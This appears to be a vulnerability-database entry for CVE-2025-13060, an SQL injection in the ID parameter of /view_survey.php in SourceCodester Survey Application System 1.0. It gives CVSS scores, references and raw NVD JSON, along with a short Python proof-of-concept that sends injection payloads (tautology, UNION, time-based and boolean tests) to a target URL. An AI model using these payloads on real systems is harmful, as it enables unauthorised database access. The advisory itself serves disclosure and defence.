CVE-2025-13060

Description

A security vulnerability has been detected in SourceCodester Survey Application System 1.0. This affects an unknown function of the file /view_survey.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:oretnom23:survey_application_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Survey Application System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-13060 SQL Injection PoC
# Target: SourceCodester Survey Application System 1.0
# File: /view_survey.php
# Parameter: ID

import requests
import sys

target_url = "http://target.com/view_survey.php"

# Basic SQL Injection test payloads
payloads = [
    "1' OR '1'='1",  # Authentication bypass
    "1' UNION SELECT 1,2,3,4,5-- -",  # Union-based injection
    "1' AND SLEEP(5)-- -",  # Time-based blind injection
    "1' AND 1=1-- -",  # Boolean test (true)
    "1' AND 1=2-- -",  # Boolean test (false)
]

def test_sql_injection(url, param='id'):
    print(f"[*] Testing SQL Injection on {url}")
    print(f"[*] Target parameter: {param}")
    
    for payload in payloads:
        try:
            params = {param: payload}
            response = requests.get(url, params=params, timeout=10)
            
            print(f"\n[+] Payload: {payload}")
            print(f"    Status Code: {response.status_code}")
            print(f"    Response Length: {len(response.text)}")
            
            # Check for SQL error messages
            if any(err in response.text.lower() for err in ['sql', 'mysql', 'syntax', 'warning', 'error']):
                print("    [!] Potential SQL error detected!")
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    test_sql_injection(target_url)
    print("\n[*] PoC execution completed. Manual verification required.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13060
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13060
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13060/
[4] VulDB https://vuldb.com/cve/CVE-2025-13060
[5] https://github.com/lakshayyverma/CVE-Discovery/blob/main/Survey%20Application%20System%202%20.md
[6] https://vuldb.com/?ctiid.332187
[7] https://vuldb.com/?id.332187
[8] https://vuldb.com/?submit.682565
[9] https://www.sourcecodester.com/
[10] https://github.com/lakshayyverma/CVE-Discovery/blob/main/Survey%20Application%20System%202%20.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13060", "sourceIdentifier": "[email protected]", "published": "2025-11-12T20:15:39.357", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in SourceCodester Survey Application System 1.0. This affects an unknown function of the file /view_survey.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oretnom23:survey_application_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC838E1E-FAEC-4100-8364-41B7D342A010"}]}]}], "references": [{"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/Survey%20Application%20System%202%20.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332187", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332187", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.682565", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/lakshayyverma/CVE-Discovery/blob/main/Survey%20Application%20System%202%20.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}